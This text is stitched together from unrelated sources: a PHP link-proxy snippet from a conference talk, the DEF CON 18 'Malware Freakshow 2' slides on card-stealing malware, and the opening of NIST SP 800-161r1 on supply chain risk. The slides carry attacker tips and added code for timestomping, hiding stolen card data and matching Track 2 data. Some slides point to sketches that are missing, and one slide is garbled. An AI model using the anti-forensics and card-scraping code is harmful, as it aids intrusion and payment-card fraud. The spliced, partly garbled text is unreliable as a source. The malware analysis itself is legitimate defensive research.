href=”https://www.some_online_resource.com/members/link.html”>
link
</a>
to:
<a href=”http://www.some_safe_place.com/link_proxy.php?
url=https://www.some_online_resource.com/members/link.html”>
link
</a>
Link proxy code
<BASE HREF="https://www.some_online_resource.com/members">
<?php
// Grab the destination URL passed in by the rewritten link
$url = $_GET['url'];

$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_HEADER, 0);                    // don't echo response headers
curl_setopt ($ch, CURLOPT_USERPWD, "username:password"); // site credentials
curl_setopt ($ch, CURLOPT_REFERER, "");                  // destroy the REFERER
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/7.01");    // spoof a browser agent
curl_exec ($ch);                                          // fetch and echo the page
curl_close ($ch);
?>
Thank you
(Q&A)
Mike Schrenk
[email protected]
www.schrenk.com
DEF CON 18
Malware Freakshow 2
Nicholas J. Percoco & Jibran Ilyas
Agenda
• About Us
• Introduction
• What’s a Malware Freakshow?
• Anatomy of a Successful Malware Attack
• Sample Analysis + Victim + Demo
• Sample SL2009-127 – Memory Rootkit Malware
• Sample SL2010-018 – Windows Credential Stealer
• Sample SL2009-143 – Network Sniffer Rootkit
• Sample SL2010-007 – Client-side PDF Attack
• Conclusions
About Us
Nicholas J. Percoco / Senior Vice President at Trustwave
• 15 Years in InfoSec / BS in Computer Science
• Built and Leads the SpiderLabs team at Trustwave
• Interests:
− Targeted Malware, Attack Prevention, Mobile Devices
• Business / Social Impact Standpoint
Jibran Ilyas / Senior Security Consultant at Trustwave
• 8 Years in InfoSec / Masters in Infotech Management from Northwestern University
• Interests:
− Antiforensics, Artifact Analysis, Real-time Defense
Introduction
We had a busy year!!
• Over 200 incidents in 24 different countries
• Hundreds of Samples to pick from
• We picked the most interesting for you
New Targets This Year
• Sports Bar in Miami
• Online Adult Toy Store
• International VoIP Provider
• US Defense Contractor
Malware Developers were busy updating/improving their code
• Many improvements to avoid detection
• Maybe they saw our Freakshow last year
What’s a Malware Freakshow?
We have access to breached environments
• These environments contain valuable data
• Smash and Grab is old school
• Attackers spend an average of 156 days before getting caught
• With time, comes exploration and development
• Custom and Targeted Malware is the Norm, not the exception
• Gather and perform analysis on each piece of Malware
− A Malware Freakshow demos samples to the security community
− Benefit: Learn the sophistication of the current threats
− Goal: Rethink the way we alert and defend!!!
Anatomy of a Successful Malware Attack
Malware development takes a methodical approach
• Step 1: Identifying the Target
• Step 2: Developing the Malware
• Step 3: Infiltrating the Victim
• Step 4: Finding the Data
• Step 5: Getting the Loot Out
• Step 6: Covering Tracks and Obfuscation (optional)
Before we discuss the samples, we'll cover this process.
Anatomy – Step 1: Identifying the Target
Target the Data that will lead to the Money
• Credit Card Data
− Exists in plain text in many types of environments
− Cash is just 4 hops away:
[Track Data] -> [Fake Card] -> [Fraud] -> [Sale of Goods] -> [Cash]
• ATM/Debit Card Data
− Limited to only ATM Networks and places accepting debit
− Need PIN as well
− Cash is just 3 hops away:
[Track Data+PIN] -> [Fake Card] -> [ATM Machine] -> [Cash]
Anatomy – Step 2: Developing the Malware
Depends on the Target System, but focus on the Big Three
• Keystroke Logger
• Network Sniffer
• Memory Dumper
• Disk Parser?
Design Considerations
• Naming Convention
• blabla.exe – not the best name choice
• svchost.exe – much better
• Functionality
• Slow and Steady wins the race
• Persistency and Data Storage
Anatomy – Step 3: Infiltrating the Victim
Three basic methods of planting your malware:
• The Physical Way
− "Hi, I'm Ryan Jones. Look over there. pwned"
• The Easy Way
− "Nice to meet you RDP & your friend default password"
• The Über Way
− 0days
− "Silent But Deadly"
Anatomy – Step 4: Finding the Data
The Software Holds the "Secrets"
• Task Manager
− Busy Processes == Data Processing
• Process's Folders
− Temp Files == Sensitive Data
• Configuration Files
− Debug Set to ON == Shields Down
• The Wire
− Local Network Traffic == Clear Text
Anatomy – Step 5: Getting the Loot Out
Keep It Simple Stupid
• Little to no egress filtering doesn't mean use TCP 31337
• Don't Reinvent the Wheel
− FTP
− HTTP
− HTTPS
− SMTP
• IT/Security Professionals Look for Freaks
− Traffic on high ports == suspicious
Anatomy – Step 6: Covering Tracks and Obfuscation
Don't Be Clumsy
• Test the Malware First!
− Crashing Systems = Sorta Bad
− Filling Up Disk Space = Real Bad
− CMD Popping Up = Just Stupid
Mess with the Cops
• MAC times to match system install dates (see the sketch below)
• Obfuscate Output file; even just slightly
• Pack the Bag of Tricks
• Automate, but Randomize Events
• Rootkits
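A hedged sketch of the MAC-time trick above (illustrative only; the file paths are invented): copy the modified/accessed timestamps from a file laid down at OS install time onto the dropped binary so timeline analysis blends it into the install era. Note that os.utime only covers two of the three MAC times; NTFS creation time requires other APIs:

import os

dropped = r"C:\WINDOWS\system32\svchost32.exe"   # hypothetical dropped file
reference = r"C:\WINDOWS\system32\kernel32.dll"  # file from the original install

# Copy the reference file's modified/accessed times onto the dropped file
stat = os.stat(reference)
os.utime(dropped, (stat.st_atime, stat.st_mtime))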
Sample SL2009-127 – Memory Rootkit Malware
Vitals
Code Name: Capt. Brain Drain
Filename: ram32.sys
File Type: PE 32-bit, Kernel Driver
Target Platform: Windows
Key Features
• Installs malware as a rootkit to stay hidden from process list
• Checks all running processes in kernel for track data
• Output dumped to file w/ "HIDDEN" and "SYSTEM" attributes
• Character substitution in output file to avoid detection (see the sketch after this list)
• At set time daily, malware archives data and flushes the data from output file to avoid duplication of stolen data
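To make the character-substitution idea concrete (an illustration of the general technique; the mapping below is invented, not the actual ram32.sys table), a scraper can translate digits and separators to innocuous letters before writing its output file so the dump doesn't trip naive card-number scanners:

# Invented substitution table: digits and separators -> innocuous letters
ENCODE = str.maketrans("0123456789=^", "qwertyuiopas")
DECODE = {v: k for k, v in zip("0123456789=^", "qwertyuiopas")}

def obfuscate(track):
    return track.translate(ENCODE)

def deobfuscate(blob):
    return "".join(DECODE.get(c, c) for c in blob)

sample = "4111111111111111=15121011000012340000"  # test track 2 style data
assert deobfuscate(obfuscate(sample)) == sample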
Victim
Sports Bar in Miami
• An elite location that attracts celebrities
• IT operations outsourced to Third Party
• Owner throws away security and compliance notices as monthly IT expenses "give him a headache".
• POS System is also a DVR server
Sample SL2009-127 – Memory Rootkit Malware
It’s Demo Time!
Sample SL2010-018 – Windows Credential Stealer
Vitals
Code Name: Don't Call Me Gina
Filename: fsgina.dll
File Type: Win32 Dynamic Link Library
Target Platform: Windows
Key Features
• Loads with Winlogon.exe process
• Changes Windows Authentication screen to a "Domain login" screen.
• Stores stolen credentials in ASCII file on system
• Only stores successful logins
• Attempts exporting logins via SMTP to an email address (see the sketch after this list).
Online
Adult
Toy
Store
•
A
100
person
company
on
the
West
Coast
of
USA.
•
Outsourced
website
hosHng
and
dev
to
a
low
cost
provider
•
Admin
page
allows
uploads
of
files
•
Database
stores
card
data
for
10
minutes
post
transacHon
Sample SL2010-018 – Windows Credential Stealer
Another Demo!
Sample SL2009-143 – Network Sniffer Rootkit
Vitals
Code Name: Clandestine Transit Authority
Filename: winsrv32.exe
File Type: PE 32-bit
Target Platform: Windows
Key Features
• Components of malware embedded inside it - Ngrep, RAR tool and Config file
• Uses rootkit to hide malware from Task Manager
• Ngrep options contain a Track Data regular expression (see the sketch after this list)
• At the end of the day, it RARs and password protects the temporary output file and creates a new file for the next day.
• Exports compressed and password protected data via FTP
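For flavor, here is roughly what a Track 2 matching pattern looks like (my approximation of the general idea; the actual expression shipped in the malware's config is not reproduced here): a 13-19 digit PAN, an "=" separator, expiry, service code, and discretionary data:

import re

# Approximate Track 2 layout: ;PAN=YYMM<service><discretionary>? (sentinels optional)
TRACK2 = re.compile(rb";?(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)\??")

packet = b"noise;4111111111111111=15121011000012340000?noise"  # test data only
m = TRACK2.search(packet)
if m:
    pan, yy, mm, service = m.group(1), m.group(2), m.group(3), m.group(4)
    print(pan.decode(), yy.decode(), mm.decode(), service.decode())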
Victim
International VoIP Provider
• Seven person company (~80,000 active customers)
• 2 methods of payment: website or kiosk
• Data Center was in barn; was home to 20 farm cats
• Payment Switch support outsourced to 3rd party
Sample SL2009-143 – Network Sniffer Rootkit
Demo #3!
Sample SL2010-007 – Client-Side PDF Attack
Vitals
Code Name: Dwight's Duper
Filename: Announcement.pdf
File Type: Portable Document Format
Target Platform: Windows
Key Features
• Malware attached in targeted email looks to be a normal PDF
• PDF contains 0day exploit (in January it was).
• Shell code executes upon PDF launch
• Shell code calls a batch file which steals all *.docx, xlsx, pptx and txt files from user's My Documents folder
• Stolen files are compressed, password protected and sent to FTP over TCP port 443 (see the sketch after this list)
Victim
US Defense Contractor
• Provides analytics service to US Military
• No inbound access allowed from the Internet without VPN
• Egress filtering set to only allow TCP ports 80 and 443
• Extremely secure environment compared to previous 3
Sample SL2010-007 – Client-Side PDF Attack
Last One!
Conclusions (What we learned in the past year)
Customization of Malware
• One size fits all is not the mantra of attackers today
Slow and Steady wins the race
• Malware writers are not in for quick and dirty hacks. Since data is stolen in transit, persistency is the key.
AntiForensics
• Detection is not easy for this new-age malware. MAC times are modified, random events configured, and protection from detection built in.
Automation
• Attackers are adding layers to malware to automate tasks so that they don't have to come in to the system and risk detection.
Not Slowing Down
• Since Malware Freakshow last year at DEF CON 17, the techniques have improved significantly.
Contact Us:
Nicholas J. Percoco / [email protected] / @c7five
Jibran Ilyas / [email protected] / @jibranilyas
NIST Special Publication
NIST SP 800-161r1
Cybersecurity Supply Chain Risk
Management Practices for Systems
and Organizations
Jon Boyens
Angela Smith
Nadya Bartol
Kris Winkler
Alex Holbrook
Matthew Fallon
This publication is available free of charge from:
https://doi.org/10.6028/NIST.SP.800-161r1
NIST Special Publication
NIST SP 800-161r1
Cybersecurity Supply Chain Risk
Management Practices for Systems
and Organizations
Jon Boyens
Angela Smith
Computer Security Division
Information Technology Laboratory
Nadya Bartol
Kris Winkler
Alex Holbrook
Matthew Fallon
Boston Consulting Group
This publication is available free of charge from:
https://doi.org/10.6028/NIST.SP.800-161r1
May 2022
U.S. Department of Commerce
Gina M. Raimondo, Secretary
National Institute of Standards and Technology
Laurie E. Locascio, NIST Director and Undersecretary of Commerce for Standards and Technology
Authority
This publication has been developed by NIST in accordance with its statutory responsibilities under the
Federal Information Security Modernization Act (FISMA) of 2014, 44 U.S.C. § 3551 et seq., Public Law
(P.L.) 113-283. NIST is responsible for developing information security standards and guidelines, including
minimum requirements for federal information systems, but such standards and guidelines shall not apply
to national security systems without the express approval of appropriate federal officials exercising policy
authority over such systems. This guideline is consistent with the requirements of the Office of Management
and Budget (OMB) Circular A-130.
Nothing in this publication should be taken to contradict the standards and guidelines made mandatory and
binding on federal agencies by the Secretary of Commerce under statutory authority. Nor should these
guidelines be interpreted as altering or superseding the existing authorities of the Secretary of Commerce,
Director of the OMB, or any other federal official. This publication may be used by nongovernmental
organizations on a voluntary basis and is not subject to copyright in the United States. Attribution would,
however, be appreciated by NIST.
National Institute of Standards and Technology Special Publication 800-161r1
Natl. Inst. Stand. Technol. Spec. Publ. 800-161r1, 326 pages (May 2022)
CODEN: NSPUE2
This publication is available free of charge from:
https://doi.org/10.6028/NIST.SP.800-161r1
Certain commercial entities, equipment, or materials may be identified in this document in order to describe an
experimental procedure or concept adequately. Such identification is not intended to imply recommendation or
endorsement by NIST, nor is it intended to imply that the entities, materials, or equipment are necessarily the best
available for the purpose.
There may be references in this publication to other publications currently under development by NIST in accordance
with its assigned statutory responsibilities. The information in this publication, including concepts and methodologies,
may be used by federal agencies even before the completion of such companion publications. Thus, until each
publication is completed, current requirements, guidelines, and procedures, where they exist, remain operative. For
planning and transition purposes, federal agencies may wish to closely follow the development of these new
publications by NIST.
Organizations are encouraged to review all draft publications during public comment periods and provide feedback to
NIST. Many NIST cybersecurity publications, other than the ones noted above, are available at
https://csrc.nist.gov/publications.
Submit comments on this publication to: [email protected]
National Institute of Standards and Technology
Attn: Computer Security Division, Information Technology Laboratory
100 Bureau Drive (Mail Stop 8930) Gaithersburg, MD 20899-8930
All comments are subject to release under the Freedom of Information Act (FOIA).
Reports on Computer Systems Technology
The Information Technology Laboratory (ITL) at the National Institute of Standards and
Technology (NIST) promotes the U.S. economy and public welfare by providing technical
leadership for the Nation’s measurement and standards infrastructure. ITL develops tests, test
methods, reference data, proof of concept implementations, and technical analyses to advance the
development and productive use of information technology. ITL’s responsibilities include the
development of management, administrative, technical, and physical standards and guidelines for
the cost-effective security and privacy of other than national security-related information in federal
information systems. The Special Publication 800-series reports on ITL’s research, guidelines, and
outreach efforts in information system security, and its collaborative activities with industry,
government, and academic organizations.
Abstract
Organizations are concerned about the risks associated with products and services that may
potentially contain malicious functionality, are counterfeit, or are vulnerable due to poor
manufacturing and development practices within the supply chain. These risks are associated
with an enterprise’s decreased visibility into and understanding of how the technology they
acquire is developed, integrated, and deployed or the processes, procedures, standards, and
practices used to ensure the security, resilience, reliability, safety, integrity, and quality of the
products and services.
This publication provides guidance to organizations on identifying, assessing, and mitigating
cybersecurity risks throughout the supply chain at all levels of their organizations. The
publication integrates cybersecurity supply chain risk management (C-SCRM) into risk
management activities by applying a multilevel, C-SCRM-specific approach, including guidance
on the development of C-SCRM strategy implementation plans, C-SCRM policies, C-SCRM
plans, and risk assessments for products and services.
Keywords
acquire; C-SCRM; cybersecurity supply chain; cybersecurity supply chain risk management;
information and communication technology; risk management; supplier; supply chain; supply
chain risk assessment; supply chain assurance; supply chain risk; supply chain security.
Acknowledgments
The authors – Jon Boyens of the National Institute of Standards and Technology (NIST), Angela
Smith (NIST), Nadya Bartol, Boston Consulting Group (BCG), Kris Winkler (BCG), Alex
Holbrook (BCG), and Matthew Fallon (BCG) – would like to acknowledge and thank Alexander
Nelson (NIST), Murugiah Souppaya (NIST), Paul Black (NIST), Victoria Pillitteri (NIST),
Kevin Stine (NIST), Stephen Quinn (NIST), Nahla Ivy (NIST), Isabel Van Wyk (NIST), Jim
Foti (NIST), Matthew Barrett (Cyber ESI), Greg Witte (Huntington Ingalls), R.K. Gardner (New
World Technology Partners), David A. Wheeler (Linux Foundation), Karen Scarfone (Scarfone
Cybersecurity), Natalie Lehr-Lopez (ODNI/NCSC), Halley Farrell (BCG), and the original
authors of NIST SP 800-161, Celia Paulsen (NIST), Rama Moorthy (Hatha Systems), and
Stephanie Shankles (U.S. Department of Veterans Affairs) for their contributions. The authors
would also like to thank the C-SCRM community, which has provided invaluable insight and
diverse perspectives for managing the supply chain, especially the departments and agencies who
shared their experience and documentation on NIST SP 800-161 implementation since its release
in 2015, as well as the public and private members of the Enduring Security Framework who
collaborated to provide input to Appendix F.
Patent Disclosure Notice
NOTICE: The Information Technology Laboratory (ITL) has requested that holders of patent claims
whose use may be required for compliance with the guidance or requirements of this publication
disclose such patent claims to ITL. However, holders of patents are not obligated to respond to ITL
calls for patents and ITL has not undertaken a patent search in order to identify which, if any,
patents may apply to this publication.
As of the date of publication and following call(s) for the identification of patent claims whose use
may be required for compliance with the guidance or requirements of this publication, no such
patent claims have been identified to ITL.
No representation is made or implied by ITL that licenses are not required to avoid patent
infringement in the use of this publication.
Table of Contents
INTRODUCTION
1.1. Purpose
1.2. Target Audience
1.3. Guidance for Cloud Service Providers
1.4. Audience Profiles and Document Use Guidance
1.4.1. Enterprise Risk Management and C-SCRM Owners and Operators
1.4.2. Enterprise, Agency, and Mission and Business Process Owners and Operators
1.4.3. Acquisition and Procurement Owners and Operators
1.4.4. Information Security, Privacy, or Cybersecurity Operators
1.4.5. System Development, System Engineering, and System Implementation Personnel
1.5. Background
1.5.1. Enterprise's Supply Chain
1.5.2. Supplier Relationships Within Enterprises
1.6. Methodology for Building C-SCRM Guidance Using NIST SP 800-39; NIST SP 800-37, Rev 2; and NIST SP 800-53, Rev 5
1.7. Relationship to Other Publications and Publication Summary
INTEGRATION OF C-SCRM INTO ENTERPRISE-WIDE RISK MANAGEMENT
2.1. The Business Case for C-SCRM
2.2. Cybersecurity Risks Throughout Supply Chains
2.3. Multilevel Risk Management
2.3.1. Roles and Responsibilities Across the Three Levels
2.3.2. Level 1 – Enterprise
2.3.3. Level 2 – Mission and Business Process
2.3.4. Level 3 – Operational
2.3.5. C-SCRM PMO
CRITICAL SUCCESS FACTORS
3.1. C-SCRM in Acquisition
3.1.1. Acquisition in the C-SCRM Strategy and Implementation Plan
3.1.2. The Role of C-SCRM in the Acquisition Process
3.2. Supply Chain Information Sharing
3.3. C-SCRM Training and Awareness
3.4. C-SCRM Key Practices
3.4.1. Foundational Practices
3.4.2. Sustaining Practices
3.4.3. Enhancing Practices
3.5. Capability Implementation Measurement and C-SCRM Measures
3.5.1. Measuring C-SCRM Through Performance Measures
3.6. Dedicated Resources
REFERENCES
APPENDIX A: C-SCRM SECURITY CONTROLS
C-SCRM CONTROLS INTRODUCTION
C-SCRM CONTROLS SUMMARY
C-SCRM CONTROLS THROUGHOUT THE ENTERPRISE
APPLYING C-SCRM CONTROLS TO ACQUIRING PRODUCTS AND SERVICES
SELECTING, TAILORING, AND IMPLEMENTING C-SCRM SECURITY CONTROLS
C-SCRM SECURITY CONTROLS
FAMILY: ACCESS CONTROL
FAMILY: AWARENESS AND TRAINING
FAMILY: AUDIT AND ACCOUNTABILITY
FAMILY: ASSESSMENT, AUTHORIZATION, AND MONITORING
FAMILY: CONFIGURATION MANAGEMENT
FAMILY: CONTINGENCY PLANNING
FAMILY: IDENTIFICATION AND AUTHENTICATION
FAMILY: INCIDENT RESPONSE
FAMILY: MAINTENANCE
FAMILY: MEDIA PROTECTION
FAMILY: PHYSICAL AND ENVIRONMENTAL PROTECTION
FAMILY: PLANNING
FAMILY: PROGRAM MANAGEMENT
FAMILY: PERSONNEL SECURITY
FAMILY: PERSONALLY IDENTIFIABLE INFORMATION PROCESSING AND TRANSPARENCY
FAMILY: RISK ASSESSMENT
FAMILY: SYSTEM AND SERVICES ACQUISITION
FAMILY: SYSTEM AND COMMUNICATIONS PROTECTION
FAMILY: SYSTEM AND INFORMATION INTEGRITY
FAMILY: SUPPLY CHAIN RISK MANAGEMENT
APPENDIX B: C-SCRM CONTROL SUMMARY
APPENDIX C: RISK EXPOSURE FRAMEWORK
SAMPLE SCENARIOS
SCENARIO 1: Influence or Control by Foreign Governments Over Suppliers
SCENARIO 2: Telecommunications Counterfeits
SCENARIO 3: Industrial Espionage
SCENARIO 4: Malicious Code Insertion
SCENARIO 5: Unintentional Compromise
SCENARIO 6: Vulnerable Reused Components Within Systems
APPENDIX D: C-SCRM TEMPLATES
1. C-SCRM STRATEGY AND IMPLEMENTATION PLAN
1.1. C-SCRM Strategy and Implementation Plan Template
2. C-SCRM POLICY
2.1. C-SCRM Policy Template
3. C-SCRM PLAN
3.1. C-SCRM Plan Template
4. CYBERSECURITY SUPPLY CHAIN RISK ASSESSMENT TEMPLATE
4.1. C-SCRM Template
APPENDIX E: FASCSA
INTRODUCTION
Purpose, Audience, and Background
Scope
Relationship to NIST SP 800-161, Rev. 1, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations
SUPPLY CHAIN RISK ASSESSMENTS (SCRAs)
General Information
Baseline Risk Factors (Common, Minimal)
Risk Severity Schema
Risk Response Guidance
ASSESSMENT DOCUMENTATION AND RECORDS MANAGEMENT
Content Documentation Guidance
Assessment Record
APPENDIX F: RESPONSE TO EXECUTIVE ORDER 14028's CALL TO PUBLISH GUIDELINES FOR ENHANCING SOFTWARE SUPPLY CHAIN SECURITY
APPENDIX G: C-SCRM ACTIVITIES IN THE RISK MANAGEMENT PROCESS
TARGET AUDIENCE
ENTERPRISE-WIDE RISK MANAGEMENT AND THE RMF
Frame
Assess
Respond
Monitor
APPENDIX H: GLOSSARY
APPENDIX I: ACRONYMS
APPENDIX J: RESOURCES
RELATIONSHIP TO OTHER PROGRAMS AND PUBLICATIONS
NIST Publications
Regulatory and Legislative Guidance
Other U.S. Government Reports
Standards, Guidelines, and Best Practices
List of Figures
Fig. 1-1: Dimensions of C-SCRM
Fig. 1-2: An Enterprise's Visibility, Understanding, and Control of its Supply Chain
Fig. 2-1: Risk Management Process
Fig. 2-2: Cybersecurity Risks Throughout the Supply Chain
Fig. 2-3: Multilevel Enterprise-Wide Risk Management
Fig. 2-4: C-SCRM Documents in Multilevel Enterprise-wide Risk Management
Fig. 2-5: Relationship Between C-SCRM Documents
Fig. 3-1: C-SCRM Metrics Development Process
Fig. A-1: C-SCRM Security Controls in NIST SP 800-161, Rev. 1
Fig. D-1: Example C-SCRM Plan Life Cycle
Fig. D-2: Example Likelihood Determination
Fig. D-3: Example Risk Exposure Determination
Fig. G-1: Cybersecurity Supply Chain Risk Management (C-SCRM)
Fig. G-2: C-SCRM Activities in the Risk Management Process
Fig. G-3: C-SCRM in the Frame Step
Fig. G-4: Risk Appetite and Risk Tolerance
Fig. G-5: Risk Appetite and Risk Tolerance Review Process
Fig. G-6: C-SCRM in the Assess Step
Fig. G-7: C-SCRM in the Respond Step
Fig. G-8: C-SCRM in the Monitor Step
List of Tables
Table 2-1: Cybersecurity Supply Chain Risk Management Stakeholders
Table 3-1: C-SCRM in the Procurement Process
Table 3-2: Supply Chain Characteristics and Cybersecurity Risk Factors Associated with a Product, Service, or Source of Supply
Table 3-3: Example C-SCRM Practice Implementation Model
Table 3-4: Example Measurement Topics Across the Risk Management Levels
Table A-1: C-SCRM Control Format
Table B-1: C-SCRM Control Summary
Table C-1: Sample Risk Exposure Framework
Table C-2: Scenario 1
Table C-3: Scenario 2
Table C-4: Scenario 3
Table C-5: Scenario 4
Table C-6: Scenario 5
Table C-7: Scenario 6
Table D-1: Objective 1 – Implementation milestones to effectively manage cybersecurity risks throughout the supply chain
Table D-2: Objective 2 – Implementation milestones for serving as a trusted source of supply for customers
Table D-3: Objective 3 – Implementation milestones to position the enterprise as an industry leader in C-SCRM
Table D-4: Version Management Table
Table D-5: Version Management Table
Table D-6: System Information Type and Categorization
Table D-7: Security Impact Categorization
Table D-8: System Operational Status
Table D-9: Information Exchange and System Connections
Table D-10: Role Identification
Table D-11: Revision and Maintenance
Table D-12: Acronym List
Table D-13: Information Gathering and Scoping Analysis
Table D-14: Version Management Table
Table E-1: Baseline Risk Factors
Table E-2: Risk Severity Schema
Table E-3: Assessment Record – Minimal Scope of Content and Documentation
Table G-1: Examples of Supply Chain Cybersecurity Threat Sources and Agents
Table G-2: Supply Chain Cybersecurity Threat Considerations
Table G-3: Supply Chain Cybersecurity Vulnerability Considerations
Table G-4: Supply Chain Cybersecurity Consequence and Impact Considerations
Table G-5: Supply Chain Cybersecurity Likelihood Considerations
Table G-6: Supply Chain Constraints
Table G-7: Supply Chain Risk Appetite and Risk Tolerance
Table G-8: Examples of Supply Chain Cybersecurity Vulnerabilities Mapped to the Enterprise Levels
Table G-9: Controls at Levels 1, 2, and 3
INTRODUCTION
Information and communications technology (ICT) and operational technology (OT) rely on a
complex, globally distributed, extensive, and interconnected supply chain ecosystem that is
comprised of geographically diverse routes and consists of multiple levels of outsourcing.
This ecosystem is composed of public and private sector entities (e.g., acquirers, suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related
service providers)1 that interact to research, develop, design, manufacture, acquire, deliver,
integrate, operate, maintain, dispose of, and otherwise utilize or manage ICT/OT products and
services. These interactions are shaped and influenced by a set of technologies, laws, policies,
procedures, and practices.
This ecosystem has evolved to provide a set of highly refined, cost-effective, and reusable
solutions. Public and private sector entities have rapidly adopted this ecosystem of solutions and
increased their reliance on commercially available products, system integrator support for
custom-built systems, and external service providers. This, in turn, has increased the complexity,
diversity, and scale of these entities.
In this document, the term supply chain refers to the linked set of resources and processes
between and among multiple levels of an enterprise, each of which is an acquirer that begins
with the sourcing of products and services and extends through the product and service life
cycle.
Given the definition of supply chain, cybersecurity risks throughout the supply chain2,3 refers
to the potential for harm or compromise that may arise from suppliers, their supply chains, their
products, or their services. Cybersecurity risks throughout the supply chain are the results of
threats that exploit vulnerabilities or exposures within products and services that traverse the
supply chain or threats that exploit vulnerabilities or exposures within the supply chain itself.
Examples of cybersecurity risks throughout the supply chain include:
1) A widget manufacturer whose design material is stolen in another country, resulting in the
loss of intellectual property and market share.
2) A widget manufacturer that experiences a supply disruption for critical manufacturing
components due to a ransomware attack at a supplier three tiers down in the supply chain.
3) A store chain that experiences a massive data breach tied to an HVAC vendor with access to
the store chain’s data-sharing portal.
Note that SCRM and C-SCRM refer to the same concept for the purposes of NIST publications.
In general practice, C-SCRM is at the nexus of traditional Supply Chain Risk Management
(SCRM) and traditional Information Security. Organizations may employ different terms and
definitions for SCRM outside of the scope of this publication. This publication does not address
many of the non-cybersecurity aspects of SCRM.

1 See the Glossary for definitions for suppliers, developers, system integrators, external system service providers, and other ICT/OT-related service providers.
2 In the 2015 version of SP 800-161, NIST used the term "ICT supply chain." In this revision, NIST has intentionally moved away from this term as cybersecurity risks can arise in all product and service supply chains, including both ICT and non-technology supply chains.
3 In an effort to harmonize terminology, the expression "cybersecurity risk in supply chains" should be considered equivalent to "cyber risk in supply chains" for the purposes of this document. In the same manner, the expression "cybersecurity supply chain risk management" should be considered equivalent to "cyber supply chain risk management."
Technology solutions provided through a supply chain of competing vendors offer significant
benefits, including low cost, interoperability, rapid innovation, and product feature variety.
Whether proprietary, government-developed, or open source, these solutions can meet the needs
of a global base of public and private sector customers. However, the same factors that create
such benefits also increase the potential for cybersecurity risks that arise directly or indirectly
from the supply chain. Cybersecurity risks throughout the supply chain are often undetected and
impact the acquirer and the end-user. For example, deployed software is typically a commercial
off-the-shelf (COTS) product, which includes smaller COTS or open source software
components developed or sourced at multiple tiers. Updates to software deployed across
enterprises often fail to update the smaller COTS components with known vulnerabilities,
including cases in which the component vulnerabilities are exploitable in the larger enterprise
software. Software users may be unable to detect the smaller known vulnerable components in
larger COTS software (e.g., lack of transparency, insufficient vulnerability management, etc.).
The non-standardized nature of C-SCRM practices adds an additional layer of complexity as this
makes the consistent measurement and management of cybersecurity risks throughout the supply
chain difficult for both the organization and members of its supply chain (e.g., suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related
service providers).
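
The component-level visibility problem described above can be made concrete with a short
sketch. The following Python fragment is illustrative only and is not a method prescribed by this
publication; the inventory and vulnerability data are hypothetical stand-ins for what would, in
practice, come from a software bill of materials (SBOM) and a vulnerability feed.

    # Illustrative only: flag known-vulnerable sub-components embedded in
    # larger COTS packages. All names and versions below are hypothetical.
    inventory = {
        # top-level product -> embedded components and their versions
        "enterprise-suite-9.2": {"logging-lib": "2.14.0", "xml-parser": "1.1.3"},
        "hr-portal-4.0": {"logging-lib": "2.17.1"},
    }
    # Hypothetical feed of (component, vulnerable version) pairs.
    known_vulnerable = {("logging-lib", "2.14.0"), ("xml-parser", "1.1.3")}

    def find_embedded_risks(inventory, known_vulnerable):
        """Return (product, component, version) triples that need remediation."""
        return [
            (product, component, version)
            for product, components in inventory.items()
            for component, version in components.items()
            if (component, version) in known_vulnerable
        ]

    for product, component, version in find_embedded_risks(inventory, known_vulnerable):
        print(f"{product}: embedded {component} {version} has a known vulnerability")

The point of the sketch is that an acquirer can only perform this kind of check if suppliers
provide component-level transparency in the first place.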
In this document, the practices and controls described for Cybersecurity Supply Chain Risk
Management (C-SCRM) apply to both information technology (IT) and operational technology
(OT) environments and are inclusive of IoT. Similar to IT environments that rely on ICT
products and services, OT environments rely on OT and ICT products and services, with
cybersecurity risks arising from ICT/OT products, services, suppliers, and their supply chains.
Enterprises should include OT-related suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers within the scope of their C-
SCRM activities.
When engaging with suppliers, developers, system integrators, external system service providers,
and other ICT/OT-related service providers, agencies should carefully consider the breadth of the
Federal Government’s footprint and the high likelihood that individual agencies may enforce
varying and conflicting C-SCRM requirements. Overcoming this complexity requires
interagency coordination and partnerships. The passage of the Federal Acquisition Supply Chain
Security Act (FASCSA) of 2018 aimed to address this concern by creating a government-wide
approach to the problem of supply chain security in federal acquisitions by establishing the
Federal Acquisition Security Council (FASC). The FASC serves as a focal point for coordination
and information sharing and for a harmonized approach to acquisition security that addresses C-
SCRM in acquisition processes and procurements across the federal enterprise. In addition, the
law incorporated SCRM into FISMA by requiring reports on the progress and effectiveness of
the agency’s supply chain risk management, consistent with guidance issued by the Office of
Management and Budget (OMB) and the Council.
Note that this publication uses the term “enterprise” to describe Level 1 of the risk management
hierarchy. In practice, an organization is defined as an entity of any size, complexity, or
positioning within a larger enterprise structure (e.g., a federal agency or company). By this
definition, an enterprise is an organization, but it exists at the top level of the hierarchy where
individual senior leaders have unique risk management responsibilities [NISTIR 8286]. Several
organizations may comprise an enterprise. In these cases, an enterprise may have multiple Level
1s with stakeholders and activities defined at both the enterprise and the organization levels.
Level 1 activities conducted at the enterprise level should inform those activities completed
within the subordinate organizations. Enterprises and organizations tailor the C-SCRM practices
described in this publication as applicable and appropriate based on their own unique enterprise
structure. There are cases in this publication in which the term “organization” is inherited from a
referenced source (e.g., other NIST publication, regulatory language). Refer to NISTIR 8286,
Integrating Cybersecurity and Enterprise Risk Management (ERM), for further guidance on this
topic.
1.1. Purpose
Cybersecurity Supply Chain Risk Management (C-SCRM) is a systematic process for managing
exposure to cybersecurity risks throughout the supply chain and developing appropriate response
strategies, policies, processes, and procedures. The purpose of this publication is to provide
guidance to enterprises on how to identify, assess, select, and implement risk management
processes and mitigating controls across the enterprise to help manage cybersecurity risks
throughout the supply chain. The content in this guidance is the shared responsibility of different
disciplines with different SCRM perspectives, authorities, and legal considerations.
The C-SCRM guidance provided in this document is not one-size-fits-all. Instead, the guidance
throughout this publication should be adopted and tailored to the unique size, resources, and risk
circumstances of each enterprise. Enterprises adopting this guidance may vary in how they
implement C-SCRM practices internally. To that end, this publication describes C-SCRM
practices observed in enterprises and offers a general prioritization of C-SCRM practices (i.e.,
Foundational, Sustaining, Enabling)4 for enterprises to consider as they implement and mature
